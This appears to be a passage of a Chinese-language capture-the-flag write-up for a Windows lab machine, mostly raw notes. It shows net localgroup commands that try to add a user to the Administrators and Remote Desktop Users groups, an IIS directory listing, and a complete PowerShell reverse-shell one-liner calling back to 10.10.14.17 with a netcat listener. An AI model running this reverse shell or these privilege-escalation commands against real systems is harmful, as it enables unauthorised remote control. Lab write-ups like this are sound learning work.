Administrator
The command completed successfully.

net localgroup Administrators security /add 尝试将本用户加入管理员组，失败。

net localgroup “Remote Desktop Users”
net localgroup “Remote Desktop Users” security /add 尝试加入远程桌面用户组

## 尝试1
web路径发现一个目录，浏览器访问以及telnet访问无权限。于是google一下。

C:\inetpub>cd wwwroot

C:\inetpub\wwwroot>dir
Volume in dri

C has no label.
Volume Serial Number is 9C45-DBF0

Directory of C:\inetpub\wwwroot

08/24/2018 07:39 PM

.
08/24/2018 07:39 PM ..
08/21/2018 10:30 PM aspnet_client
08/23/2018 11:33 PM 391 index.html
08/24/2018 07:39 PM 88,712 out.jpg
2 File(s) 89,103 bytes
3 Dir(s) 16,623,439,872 bytes free

cd aspnet_client

```
http://10.10.10.98/aspnet_client/system_web/

403 - Forbidden: Access is denied.
You do not have permission to view this directory or page using the credentials that you supplied.

IIS 7.5源代码披露/身份验证绕过
https://blog.alertlogic.com/blog/internet-information-server-(iis)-exploitation/

尝试2，powershell反弹shell

nc -lnvp 6688

copy con whale.ps1

$client = New-Object System.Net.Sockets.TCPClient('10.10.14.17',6688);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Yes

type whale.ps1

总结

下回学下windows，没有msf怎么手动提权。windows提权做的比较少。